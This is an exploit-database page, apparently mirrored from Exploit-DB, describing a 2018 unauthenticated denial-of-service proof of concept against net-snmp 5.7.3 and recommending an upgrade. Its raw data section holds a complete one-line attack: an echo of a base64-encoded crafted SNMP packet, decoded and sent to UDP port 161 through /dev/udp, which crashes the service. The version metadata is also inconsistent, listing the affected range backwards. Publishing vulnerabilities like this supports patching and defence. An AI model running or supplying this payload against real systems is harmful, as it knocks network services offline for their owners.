header-logo
Suggest Exploit
vendor:
Net-SNMP
by:
Magnus Klaaborg Stubman
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Net-SNMP
Affected Version From: 5.7.3
Affected Version To: 5.6.2.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:net-snmp:net-snmp
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux, Windows
2018

net-snmp 5.7.3 – Unauthenticated Denial of Service (PoC)

This exploit is a proof of concept for a denial of service vulnerability in net-snmp 5.7.3. The vulnerability is triggered by sending a specially crafted packet to the SNMP port (UDP/161). The packet contains a base64 encoded string which is decoded and sent to the SNMP port. This causes the service to crash.

Mitigation:

Upgrade to the latest version of net-snmp.
Source

Exploit-DB raw data:

# Exploit Title: net-snmp 5.7.3 - Unauthenticated Denial of Service (PoC)
# Date: 2018-10-08
# Exploit Author: Magnus Klaaborg Stubman 
# Website: https://dumpco.re/blog/net-snmp-5.7.3-remote-dos
# Vendor Homepage: http://www.net-snmp.org/
# Software Link: https://sourceforge.net/projects/net-snmp/files/net-snmp/5.7.3/
# Version: 5.7.3, 5.5.2.1, 5.6.2.1, others not tested

echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/161

Navigation

Suggest Exploit

Services By CQR